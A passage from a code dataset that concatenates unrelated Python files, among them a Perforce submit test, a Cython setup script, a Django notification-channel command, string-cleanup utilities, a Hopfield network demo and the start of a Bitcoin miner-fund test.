other_tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(\"This is some file\" + \"\\n\")\n\n parameters.assert_submit_success([str(parameters.environment.vcs_cooking_dir) + \"/new_directory*/\"])\n\n for i in range(0, 9):\n file_name = f\"new_file{i}.txt\"\n file_path = other_tmp_dir.join(file_name)\n assert parameters.file_present(str(file_path))\n file_path = inner_dir.join(file_name)\n assert parameters.file_present(str(file_path))\n file_name = f\"another_file{i}.txt\"\n file_path = tmp_dir.join(file_name)\n assert parameters.file_present(str(file_path))\n\n # Modify some vcs\n text = utils.randomize_name(\"This is change \")\n for i in range(0, 9, 2):\n tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n tmp_file = inner_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n tmp_file = tmp_dir.join(f\"another_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n\n parameters.assert_submit_success([str(tmp_dir) + \"/new_file*.txt\"], edit_only=True)\n\n for i in range(0, 9, 2):\n file_path = tmp_dir.join(f\"/new_file{i}.txt\")\n assert parameters.text_in_file(text, str(file_path))\n file_path = inner_dir.join(f\"/new_file{i}.txt\")\n assert not parameters.text_in_file(text, str(file_path))\n file_path = tmp_dir.join(f\"/another_file{i}.txt\")\n assert not parameters.text_in_file(text, str(file_path))\n\n # Test subdirectory wildcard\n text = utils.randomize_name(\"This is change \")\n for i in range(1, 9, 2):\n tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n tmp_file = inner_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n tmp_file = tmp_dir.join(f\"another_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n\n parameters.assert_submit_success([str(tmp_dir) + \"/*/*.txt\"])\n\n for i in range(1, 9, 2):\n file_path = inner_dir.join(f\"new_file{i}.txt\")\n assert parameters.text_in_file(text, str(file_path))\n file_path = tmp_dir.join(f\"new_file{i}.txt\")\n assert not parameters.text_in_file(text, str(file_path))\n file_path = tmp_dir.join(f\"another_file{i}.txt\")\n assert not parameters.text_in_file(text, str(file_path))\n\n # Test edit-only subdirectory wildcard\n text = utils.randomize_name(\"This is change \")\n for i in range(0, 9, 3):\n tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n tmp_file = inner_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n tmp_file = tmp_dir.join(\"another_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n\n parameters.assert_submit_success([str(tmp_dir) + \"/*/*.txt\"], edit_only=True)\n\n for i in range(0, 9, 3):\n file_path = inner_dir.join(f\"new_file{i}.txt\")\n assert parameters.text_in_file(text, str(file_path))\n file_path = tmp_dir.join(f\"new_file{i}.txt\")\n assert not parameters.text_in_file(text, str(file_path))\n file_path = tmp_dir.join(f\"another_file{i}.txt\")\n assert not parameters.text_in_file(text, str(file_path))\n\n # Clean up the repo\n shutil.rmtree(str(tmp_dir))\n shutil.rmtree(str(other_tmp_dir))\n parameters.assert_submit_success([str(parameters.environment.vcs_cooking_dir) + \"/*\"])\n assert not parameters.file_present(str(tmp_dir))\n assert not parameters.file_present(str(other_tmp_dir))\n\n\ndef test_success_reconcile_partial(submit_parameters, submit_environment):\n # This test was failed when a bug in univesrum.lib.utils.unify_argument_list left empty entries in processed lists\n # When reconciling \"\", p4 adds to CL all changes made in scope of workspace (and therefore partial reconcile fails)\n\n parameters = submit_parameters(submit_environment)\n dir_name = utils.randomize_name(\"new_directory\")\n tmp_dir = parameters.environment.vcs_cooking_dir.mkdir(dir_name)\n for i in range(0, 9):\n tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(\"This is some file\" + \"\\n\")\n\n reconcile_list = [str(tmp_dir.join(f\"new_file{i}.txt\")) for i in range(0, 4)]\n reconcile_list.extend([\"\", \" \", \"\\n\"])\n parameters.assert_submit_success(reconcile_list)\n\n for i in range(0, 4):\n file_path = tmp_dir.join(f\"new_file{i}.txt\")\n assert parameters.file_present(str(file_path))\n\n for i in range(5, 9):\n file_path = tmp_dir.join(f\"new_file{i}.txt\")\n assert not parameters.file_present(str(file_path))\n\n # Delete a directory\n shutil.rmtree(tmp_dir)\n parameters.assert_submit_success([str(tmp_dir)])\n assert not parameters.file_present(str(tmp_dir))\n","sub_path":"tests/test_submit.py","file_name":"test_submit.py","file_ext":"py","file_size_in_byte":15335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"398633598","text":"\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\nimport numpy\nimport cython_gsl\n\nextra_args = []\n\nexts = [\n Extension(\"estimator2\",\n [\"estimator2.pyx\"],\n include_dirs=[numpy.get_include()],\n extra_compile_args=extra_args,\n extra_link_args=extra_args),\n Extension(\"util\",\n [\"util.pyx\"],\n include_dirs=[numpy.get_include()],\n extra_compile_args=extra_args,\n extra_link_args=extra_args),\n Extension(\"prob_estimator\",\n [\"prob_estimator.pyx\"],\n include_dirs=[numpy.get_include()],\n extra_compile_args=extra_args,\n extra_link_args=extra_args),\n Extension(\"search_model_tools\",\n [\"search_model_tools.pyx\"],\n include_dirs=[numpy.get_include(), cython_gsl.get_cython_include_dir()],\n libraries=cython_gsl.get_libraries(),\n library_dirs=[cython_gsl.get_library_dir()],\n extra_compile_args=extra_args,\n extra_link_args=extra_args),\n ]\n\nsetup(\n include_dirs = [cython_gsl.get_include()],\n cmdclass = {'build_ext': build_ext},\n ext_modules = exts,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"64177899","text":"\n\nfrom xai.brain.wordbase.nouns._pillion import _PILLION\n\n#calss header\nclass _PILLIONS(_PILLION, ):\n\tdef __init__(self,): \n\t\t_PILLION.__init__(self)\n\t\tself.name = \"PILLIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"pillion\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_pillions.py","file_name":"_pillions.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"206761702","text":"\r\n\r\n\r\n###Social transfer Data\r\n\r\n\r\n####early warning system\r\n\r\n###Income group\r\n\r\n\r\n###Country Ratings\r\n\r\n\r\n#Transforms ratings letters into 1-100 numbers\r\n\r\n\r\n###Ratings + HFA\r\ndf['borrow_abi']=(df['rating']+df['finance_pre'])/2 # Ability and willingness to improve transfers after the disaster\r\n\r\n\r\n##Hazards data\r\n###Vulnerability\r\n#VULNERABILITY OF EACH HOUSEHOLD, BUT NEED A VULNERABILITY CURVE TO TRANSLATE HOUSING TYPE INTO VULNERABILITY VALUE\r\n\r\n#EXPOSURE TO FLOOD FROM SURVEY HAZARD DATA/GLOFRIS\r\n\r\n##Protection\r\n\r\n\r\n##Data by income categories\r\ncat_info =pd.DataFrame()\r\ncat_info['n'] = concat_categories(ph,(1-ph),index= income_cats)\t#number\r\ncp= df['share1'] /ph *df['gdp_pc_pp']\t#consumption levels, by definition.\r\ncr=(1-df['share1'])/(1-ph)*df['gdp_pc_pp']\r\ncat_info['c'] = concat_categories(cp,cr,index= income_cats)\r\ncat_info['social'] = concat_categories(df.social_p,df.social_r,index= income_cats)\t#diversification\r\ncat_info['axfin'] = concat_categories(df.axfin_p,df.axfin_r,index= income_cats)\t#access to finance\r\ncat_info = cat_info.dropna()\r\n\r\n##Taxes, redistribution, capital\r\ndf['tau_tax'],cat_info['gamma_SP'] = social_to_tx_and_gsp(economy,cat_info)\t#computes tau tax and gamma_sp from socail_poor and social_nonpoor. CHECKED!\r\ncat_info['k'] = (1-cat_info['social'])*cat_info['c']/((1-df['tau_tax'])*df['avg_prod_k']) #here k in cat_info has poor and non poor, while that from capital_data.csv has only k, regardless of poor or nonpoor\r\n\r\n\r\n\r\n#access to early warnings\r\n\r\n\r\n\r\n\r\n\r\nif drop_unused_data:\r\n cat_info= cat_info.drop(['social'],axis=1, errors='ignore').dropna()\r\n df_in = df.drop(['social_p', 'social_r','share1','pov_head', 'pe','vp','vr', 'axfin_p', 'axfin_r','rating','finance_pre'],axis=1, errors='ignore').dropna()\r\nelse :\r\n df_in = df.dropna()\r\ndf_in = df_in.drop([ 'shew','v'],axis=1, errors='ignore').dropna()\r\n\r\n#Save all data\r\nfa_guessed_gar.to_csv(intermediate+'/fa_guessed_from_GAR_and_PAGER_shaved.csv',encoding='utf-8', header=True)\r\npd.DataFrame([vp,vr,v], index=['vp','vr','v']).T.to_csv(intermediate+'/v_pr_fromPAGER_shaved_GAR.csv',encoding='utf-8', header=True)\r\ndf_in.to_csv(intermediate+'/macro.csv',encoding='utf-8', header=True)\r\ncat_info.to_csv(intermediate+'/cat_info.csv',encoding='utf-8', header=True)\r\nhazard_ratios.to_csv(intermediate+'/hazard_ratios.csv',encoding='utf-8', header=True)\r\n\r\n","sub_path":"lib_aux_module_1.py","file_name":"lib_aux_module_1.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"554673262","text":"\nimport sys\nimport os\nfrom datetime import datetime\nimport config\nimport daq\n\ndef print_plot(variable, data):\n\n print('set grid')\n print('set xdata time')\n print('set timefmt \"%Y-%m-%dT%H:%M:%S\"')\n print('set format x \"%H:%M\"')\n sys.stdout.write('plot \"-\" using 1:2 with lines;\\n')\n for time, value in data:\n sys.stdout.write('{} {}\\n'.format(time.isoformat(), value))\n sys.stdout.write('e\\n')\n\n\n #vars = list([v for a in sys.argv for v in config.ARCH_VARIABLES if a == v['arch-id']])\n\n # print plot arguments\n #for v in vars:\n # title = v['plot-title'] if 'plot-title' in v else v['arch-id']\n # color = 'linecolor \"{}\"'.format(v['plot-color']) if 'plot-color' in v else ''\n # sys.stdout.write('\"-\" using 1:2 with lines {} title \"{}\" , '.format(color, title))\n #sys.stdout.write(';\\n')\n\n # print out the data\n #for v in vars:\n # file_name = ''.join((config.ARCH_DIR, v['arch-file']))\n # with open(file_name, 'r') as f:\n # for line in f:\n # timestamp, value = line.split(',')\n # sys.stdout.write('{} {}'.format(timestamp, value))\n # print('e\\n')\n\nif __name__ == \"__main__\":\n variable = sys.argv[1]\n time_interval = (\n datetime.strptime(sys.argv[2], '%Y-%m-%dT%H:%M:%S'),\n datetime.strptime(sys.argv[3], '%Y-%m-%dT%H:%M:%S')\n )\n print_plot(variable, daq.get(variable, time_interval))\n","sub_path":"rec/tools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"217872317","text":"import logging\n\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.core.management.base import BaseCommand\nfrom django.urls import reverse\nfrom django.utils.module_loading import import_string\n\nfrom ....models import APICredential\nfrom ...constants import SCOPE_NOTIFICATIES_PUBLICEREN_LABEL\nfrom ...kanalen import KANAAL_REGISTRY\nfrom ...models import NotificationsConfig\n\nlogger = logging.getLogger(__name__)\n\n\nclass KanaalExists(Exception):\n pass\n\n\ndef create_kanaal(api_root: str, kanaal: str) -> None:\n \"\"\"\n Create a kanaal, if it doesn't exist yet.\n \"\"\"\n Client = import_string(settings.ZDS_CLIENT_CLASS)\n\n if not api_root.endswith(\"/\"):\n api_root = f\"{api_root}/\"\n\n client = Client.from_url(api_root)\n client.base_url = api_root\n client.auth = APICredential.get_auth(\n api_root, scopes=[SCOPE_NOTIFICATIES_PUBLICEREN_LABEL]\n )\n\n # look up the exchange in the registry\n _kanaal = next(k for k in KANAAL_REGISTRY if k.label == kanaal)\n\n kanalen = client.list(\"kanaal\", query_params={\"naam\": kanaal})\n if kanalen:\n raise KanaalExists()\n\n # build up own documentation URL\n domain = Site.objects.get_current().domain\n protocol = \"https\" if settings.IS_HTTPS else \"http\"\n documentation_url = (\n f\"{protocol}://{domain}{reverse('notifications:kanalen')}#{kanaal}\"\n )\n\n client.create(\n \"kanaal\",\n {\n \"naam\": kanaal,\n \"documentatieLink\": documentation_url,\n \"filters\": list(_kanaal.kenmerken),\n },\n )\n\n\nclass Command(BaseCommand):\n help = \"Create kanaal in notification component\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"kanaal\", nargs=\"?\", type=str, help=\"Name of kanaal\")\n parser.add_argument(\n \"--notificaties-api-root\",\n help=\"API root of the NC, default value taken from notifications config\",\n )\n\n def handle(self, **options):\n config = NotificationsConfig.get_solo()\n\n # use CLI arg or fall back to database config\n api_root = options[\"notificaties_api_root\"] or config.api_root\n\n # use CLI arg or fall back to setting\n kanaal = options[\"kanaal\"] or settings.NOTIFICATIONS_KANAAL\n\n try:\n create_kanaal(api_root, kanaal)\n self.stdout.write(f\"Registered kanaal '{kanaal}' with {api_root}\")\n except KanaalExists:\n self.stderr.write(f\"Kanaal '{kanaal}' already exists within {api_root}\")\n","sub_path":"vng_api_common/notifications/management/commands/register_kanaal.py","file_name":"register_kanaal.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"323578098","text":"# First, if any digit in N is not one of {0,1,6,8,9}, it's not a confusing number.\r\n# Second, if rotate_180_degree(N) is not equal to N, then it's a confusing number. Because it caused ambiguity after rotated by 180 degree.\r\n# And what rotate_180_degree() do is to reverse the entire N and change 6 to 9 and 9 to 6.\r\n\r\nclass Solution(object):\r\n def confusingNumber(self, N):\r\n x, y = N, 0\r\n mapping = {0:0, 1:1, 6:9, 8:8, 9:6}\r\n while N:\r\n n, m = divmod(N, 10) # divmod(89, 10) = (8, 9)\r\n if m not in mapping: \r\n return False\r\n N, y = n, y*10 + mapping[m]\r\n \r\n return x != y\r\n \r\n \r\n# Time: O(log_10 n)\r\n# Space: O(1)","sub_path":"17 Math/1056. Confusing Number.py","file_name":"1056. Confusing Number.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455569572","text":"import numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom . import Node\n\nclass Graph:\n def __init__(self, name=''):\n self.name = name\n self.nodes = np.array([], dtype=Node)\n\n def add_node(self, node):\n if type(node) == Node:\n if not node in self.nodes:\n if (len(node.edges) == 0) or (node.edges.dtype == Node and node.edges in self.nodes):\n self.nodes = np.concatenate((self.nodes, np.array([node], dtype=Node)))\n else:\n print(\"Can't add node. Invalid type.\")\n\n def add_nodes(self, nodes): \n for node in nodes:\n self.add_node(node)\n\n @property\n def list_nodes(self):\n for node in self.nodes:\n print(\"Name: {0}, Description: {1}, Edges: {2}\".format(node.name, node.description, node.edges))\n\n def plot(self):\n G = nx.Graph()\n # add nodes first\n for n in self.nodes:\n G.add_node(n.name)\n # then add edges to nodes\n for n in self.nodes:\n for id, ne in enumerate(n.edges):\n print(n.name, ne.name)\n if len(ne.edges) > 0:\n G.add_edge(n.name, ne.name, weight=ne.edges_weight[id-1])\n # G = nx.petersen_graph()\n plt.subplot(121)\n nx.draw_random(G, with_labels=True, font_weight='bold')\n plt.show()\n","sub_path":"src/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"280394033","text":"import re\nimport os\nimport json\nimport glob\n\n\ndef cleanup_list(empsdata):\n empclr = CleanupString(empsdata)\n empclr_methods = dir(empclr)\n empclr_methods = [i for i in empclr_methods if '__' not in i]\n empclr_methods.remove('empsdata')\n empclr_methods.remove('empsdict')\n crap_data = []\n for empclr_method in empclr_methods:\n param = ''\n result = []\n if 'max_length' in empclr_method:\n param = 90\n elif 'min_length' in empclr_method:\n param = 2\n if param:\n result = empclr.__getattribute__(empclr_method)(param)\n else:\n result = empclr.__getattribute__(empclr_method)()\n crap_data.extend(result)\n valid = list(set(empsdata) - set(crap_data))\n return valid\n\n\nclass CleanupString(object):\n\n def __init__(self, empsdata):\n self.empsdata = empsdata\n self.empsdict = {i.lower(): i for i in self.empsdata}\n\n def duplicates(self):\n result = [\n i for i, j in zip(self.empsdata, self.empsdata[1:])\n if i.lower() in j.lower()]\n return result\n\n def string_max_length(self, strlen=50):\n result = [i for i in self.empsdata if len(i) >= strlen]\n return result\n\n def string_min_length(self, strlen=3):\n result = [i for i in self.empsdata if len(i) <= strlen]\n return result\n\n def string_consecutive_multiple_special_characters(self):\n result = [i for i in self.empsdata\n if re.search(\n r'(([`\\&\\)\\(\\_\\.\\,\\:\\*\\^\\%\\$\\#\\@\\!\\~\\+\\?\\>\\<\\{\\}\\/\\\\\\=\\;\\|\\\"\\[\\]\\-\\'\\ ])\\2)',\n i)]\n return result\n\n def string_consecutive_multiple_characters(self, count=4):\n result = [i for i in self.empsdata if re.search(r'((\\w)\\2{3,})', i)]\n return result\n\n def institute_string_invalid_special_character(self):\n result = [i for i in self.empsdata\n if re.search(r'[*\\^\\%\\$\\#\\@\\~\\+\\?\\>\\<\\{\\}\\/\\\\\\=\\;\\]\\[\\|]',\n i)]\n return result\n\n def check_absent_space_after_comma(self):\n result = [i for i in self.empsdata if ',' in i\n and ', ' not in i]\n return result\n\n def string_contains_month(self):\n words = [' january ', ' february ', ' march ', ' april ',\n ' july ', ' august ', ' september ', ' october ',\n ' november ', ' december ']\n result = [i for i in self.empsdata if re.search(r'\\d+', i)]\n result.extend([i for i in self.empsdata if any(x in i for x in words)])\n return result\n\n def string_start_with_more_than_2_digit_nums(self):\n result = [i for i in self.empsdata if re.search(r'^\\d{3}', i)]\n return result\n\n def check_proper_bracket_absent(self):\n result = []\n for term in self.empsdata:\n stack = []\n for i in term:\n if i == '(':\n stack.append(i)\n elif i == ')' and stack:\n stack.pop()\n elif i == ')' and not stack:\n result.append(term)\n stack = []\n break\n if stack:\n result.append(term)\n return result\n\n def check_words(self, strlen=50):\n check = [line.rstrip() for line in open('data/lists/check_words.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() in i.lower().split() for x in check)]\n return result\n\n def string_is_website_name(self):\n check = [line.rstrip() for line in open('data/lists/website_name.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() in i.lower() for x in check)]\n return result\n\n def weird_universities(self):\n check = [line.rstrip()\n for line in open('data/lists/weird_universities.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() == i.lower() for x in check)]\n return result\n\n def first_word(self):\n check = [line.rstrip() for line in open('data/lists/first_word.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() == i.lower().split()[0] for x in check)]\n return result\n\n def last_word(self):\n check = [line.rstrip() for line in open('data/lists/last_word.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() == i.lower().split()[-1] for x in check)]\n return result\n\n def check_degree(self):\n check = [line.rstrip() for line in open('data/lists/check_degree.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() in i.lower().split() for x in check)]\n return result\n","sub_path":"cleanup_utils.py","file_name":"cleanup_utils.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"439200672","text":"import os\nimport sys\nimport glob\nimport errno\nimport operator\nimport json\nimport codecs\n\nfrom urllib.parse import urlparse\n\nPATH_TO_DATA = \"_data\"\nPATH_TO_LIBRARY = 'data-library/'\n\ndef split_last(s, c):\n words = s.split(c)\n return words[len(words) - 1]\n\ndef extract_domain_from_url(url):\n parsed_uri = urlparse(url)\n domain = '{uri.netloc}'.format(uri=parsed_uri)\n domain = domain.replace(\"www.\", \"\")\n #result = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)\n \n return domain\n\n# GENERATE TEMPLATE FILE\nPATH_TO_DATASET = \"dataset\"\nURL_DATASET = \"/dataset\"\n\ndef write_template_file(file_path, layout, permalink, title, options={}):\n if not os.path.exists(os.path.dirname(file_path)):\n os.makedirs(os.path.dirname(file_path))\n\n f = codecs.open(file_path, \"w+\", \"utf-8\")\n f.write(\"---\\n\")\n f.write(\"layout: '{0}'\\n\".format(layout))\n f.write(\"permalink: '{0}'\\n\".format(permalink))\n f.write(\"title: '{0}'\\n\".format(title))\n for keyField in options:\n f.write(str(keyField) + \": '\" + options[keyField] + \"'\\n\")\n f.write(\"---\\n\")\n f.close()\n\nDATASET = {}\nfor subdir, dirs, files in os.walk(PATH_TO_LIBRARY):\n try:\n item = {}\n for filename in files:\n file = subdir + '/' + filename\n if os.path.isfile(file):\n with open(file) as f: # No need to specify 'r': this is the default.\n # datasetDoc\n if filename == 'datasetDoc.json':\n item[\"datasetDoc\"] = json.load(f)\n # pipeline\n if filename == 'best_pipeline.json':\n item[\"pipeline\"] = json.load(f)\n # problemDoc\n if filename == 'problemDoc.json':\n item[\"problemDoc\"] = json.load(f)\n\n if bool(item):\n # set path to detail page\n name = split_last(subdir, '/')\n item[\"dataset_path\"] = name.replace(\"_\", \"-\")\n\n DATASET[name] = item\n except IOError as exc:\n if exc.errno != errno.EISDIR:\n raise \"Error when load data\"\n\n\n# Save to _data directory\nfile_path = PATH_TO_DATA + \"/\" + \"datasets.json\"\nwith open(file_path, \"w+\") as f:\n json.dump(DATASET, f)\nprint(\"LOG: Saved datasets to\", file_path)\n\n# Extract Domain from URL\nLIST_DOMAIN = []\nfor dataset_name in DATASET:\n data = DATASET[dataset_name]\n if \"sourceURI\" in data[\"datasetDoc\"][\"about\"]:\n sourceURI = data[\"datasetDoc\"][\"about\"][\"sourceURI\"]\n if sourceURI:\n domain = extract_domain_from_url(sourceURI)\n if domain not in LIST_DOMAIN:\n LIST_DOMAIN.append(domain)\n# Save to _data directory\nfile_path = PATH_TO_DATA + \"/\" + \"domains.json\"\nwith open(file_path, \"w+\") as f:\n json.dump(LIST_DOMAIN, f)\nprint(\"LOG: Saved domains to\", file_path)\n\n# Task Type\nLIST_TASKTYPE = []\nfor dataset_name in DATASET:\n data = DATASET[dataset_name]\n task_type = data[\"pipeline\"][\"loader\"][\"task_type\"]\n if task_type and task_type not in LIST_TASKTYPE:\n LIST_TASKTYPE.append(task_type)\n# Save to _data directory\nfile_path = PATH_TO_DATA + \"/\" + \"tasktype.json\"\nwith open(file_path, \"w+\") as f:\n json.dump(LIST_TASKTYPE, f)\nprint(\"LOG: Saved task_type to\", file_path)\n\n# Data Type\nLIST_DATATYPE = []\nfor dataset_name in DATASET:\n data = DATASET[dataset_name]\n data_type = data[\"pipeline\"][\"loader\"][\"data_modality\"]\n if data_type and data_type not in LIST_DATATYPE:\n LIST_DATATYPE.append(data_type)\n# Save to _data directory\nfile_path = PATH_TO_DATA + \"/\" + \"datatype.json\"\nwith open(file_path, \"w+\") as f:\n json.dump(LIST_DATATYPE, f)\nprint(\"LOG: Saved data_type to\", file_path)\n\n# Generate template for detail dataset\nfor datasetID in DATASET:\n data = DATASET[datasetID]\n dataset_path = data[\"dataset_path\"]\n datasetName = data['problemDoc']['_id']\n if dataset_path:\n detail_path = PATH_TO_DATASET + \"/\" + dataset_path + \".md\"\n layout = \"detail\"\n permalink = PATH_TO_DATASET + \"/\" + dataset_path\n title = datasetName.capitalize()\n options = {\"datasetID\": datasetID}\n write_template_file(detail_path, layout, permalink, title, options)\n","sub_path":"scripts/collection_data.py","file_name":"collection_data.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"132597683","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 13 15:04:53 2020\r\n\r\n@author: ideapad\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\ndef import_image(name):\r\n '''\r\n Import image from .txt files and return arrays\r\n '''\r\n df=pd.read_csv(name+'.txt',header=None)\r\n name_arr=np.array(df)\r\n name_arr=np.sign(name_arr)\r\n plt.imshow(name_arr,cmap='Greys_r')\r\n plt.title(f'Image of {name}')\r\n plt.show()\r\n return name_arr\r\n \r\nball=import_image('ball')\r\nmona=import_image('mona')\r\ncat=import_image('cat')\r\n\r\n\r\nvec_size=ball.shape[0]*ball.shape[1]\r\nu=np.zeros(vec_size)\r\nball_S=np.reshape(ball,(vec_size,1))\r\ncat_S=np.reshape(cat,(vec_size,1))\r\nmona_S=np.reshape(mona,(vec_size,1))\r\n\r\n\r\nclass Hopfield_Net():\r\n def __init__(self,niter):\r\n self.V = np.zeros((9000,1))\r\n self.U = np.zeros((9000,1))\r\n self.weights = np.zeros((9000,9000))\r\n self.U_d = np.zeros((9000,1))\r\n self.rmse = np.zeros((niter,1))\r\n self.flag = 0 # to load all images or only ball\r\n \r\n def load_weights(self):\r\n '''\r\n loads all images\r\n '''\r\n if self.flag==1:\r\n print('Loading all images')\r\n self.weights = np.matmul(mona_S,mona_S.T) + np.matmul(ball_S,ball_S.T) + np.matmul(cat_S,cat_S.T)\r\n if self.flag==0:\r\n print('Loading the image of the ball')\r\n self.weights = np.matmul(ball_S,ball_S.T)\r\n \r\n def image_loader(self,image):\r\n '''\r\n Loads patches of images\r\n '''\r\n new_image = np.zeros((90,100))\r\n new_image[0:45,25:50] = image[0:45,25:50]\r\n return new_image\r\n \r\n def damage_weights(self,p):\r\n '''\r\n Damages the weights of the network with probability p\r\n '''\r\n indices = np.random.randint(0,9000*9000-1,int(9000*9000*p))\r\n weights_damaged=np.copy(self.weights)\r\n weights_damaged=np.reshape(weights_damaged,(9000*9000,1))\r\n print('Damaging the weights')\r\n for i in tqdm(range(len(indices))):\r\n weights_damaged[indices[i]]=0\r\n weights_damaged = np.reshape(weights_damaged,(9000,9000))\r\n return weights_damaged\r\n \r\n \r\n \r\n \r\ndef demo(niter,lambdas,flag,p):\r\n dt=1/(100)\r\n Hop_net1=Hopfield_Net(niter)\r\n Hop_net1.flag=flag\r\n Hop_net1.load_weights()\r\n Hop_net1.U = np.reshape(Hop_net1.image_loader(ball),(9000,1))\r\n Hop_net1.weights=Hop_net1.damage_weights(p)\r\n Hop_net1.weights=Hop_net1.weights/9000\r\n images_arr=[]\r\n for i in tqdm(range(niter)):\r\n Hop_net1.U_d = -Hop_net1.U + np.matmul(Hop_net1.weights,Hop_net1.V)\r\n Hop_net1.U = Hop_net1.U + (Hop_net1.U_d)*dt\r\n Hop_net1.V = np.tanh(lambdas*Hop_net1.U)\r\n Hop_net1.rmse[i]=mean_squared_error(ball_S,Hop_net1.V)\r\n \r\n img=np.reshape(Hop_net1.V,(90,100))\r\n images_arr.append(img)\r\n images_arr=np.array(images_arr)\r\n return images_arr,Hop_net1.rmse\r\n \r\ndef show(images_arr,rmse,niter,p):\r\n images_arr=np.array(images_arr)\r\n for i in range(int(niter/10)):\r\n plt.imshow(images_arr[10*i,:,:],'Greys_r')\r\n plt.title(f'Image after {10*i} iterations for {p*100}% of weight damage')\r\n plt.show()\r\n \r\n plt.plot(rmse)\r\n plt.title(f'Plot of RMSE for {p*100}% of weight damage')\r\n plt.xlabel('Number of iterations')\r\n plt.ylabel('RMSE')\r\n plt.grid()\r\n plt.show()\r\n \r\nniter=50\r\nimages_arr,rmse=demo(niter,10,0,0) # for loading ball without damage\r\nshow(images_arr,rmse,niter,0)\r\n\r\nniter=100\r\nimages_arr,rmse=demo(niter,10,1,0.25) # for loading all images with 25% damage\r\nshow(images_arr,rmse,niter,0.25)\r\n\r\nimages_arr,rmse=demo(niter,10,1,0.5) # for loading all images with 50% damage\r\nshow(images_arr,rmse,niter,0.5)\r\n\r\nimages_arr,rmse=demo(niter,10,1,0.8) # for loading all images with 75% damage\r\nshow(images_arr,rmse,niter,0.8)","sub_path":"Hopfield network/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"231513565","text":"#!/usr/bin/env python3\n# Copyright (c) 2020 The Bitcoin developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\nfrom decimal import Decimal\n\nfrom test_framework.blocktools import create_block, create_coinbase\nfrom test_framework.messages import ToHex\nfrom test_framework.test_framework import BitcoinTestFramework\nfrom test_framework.util import assert_equal, assert_greater_than_or_equal\n\nAXION_ACTIVATION_TIME = 2000000600\n\nMINER_FUND_RATIO = 8\n\nMINER_FUND_ADDR = 'ecregtest:pqnqv9lt7e5vjyp0w88zf2af0l92l8rxdgz0wv9ltl'\n\n\nclass MinerFundTest(BitcoinTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 1\n self.extra_args = [[\n '-enableminerfund',\n '-axionactivationtime={}'.format(AXION_ACTIVATION_TIME),\n ]]\n\n def run_test(self):\n node = self.nodes[0]\n address = node.get_deterministic_priv_key().address\n\n self.log.info('Create some history')\n for _ in range(0, 50):\n node.generatetoaddress(1, address)\n\n node = self.nodes[0]\n address = node.get_deterministic_priv_key().address\n\n # Move MTP forward to axion activation\n node.setmocktime(AXION_ACTIVATION_TIME)\n node.generatetoaddress(6, address)\n assert_equal(\n node.getblockchaininfo()['mediantime'],\n AXION_ACTIVATION_TIME)\n\n # Let's remember the hash of this block for later use.\n fork_block_hash = int(node.getbestblockhash(), 16)\n\n def get_best_coinbase():\n return node.getblock(node.getbestblockhash(), 2)['tx'][0]\n\n # No money goes to the fund.\n coinbase = 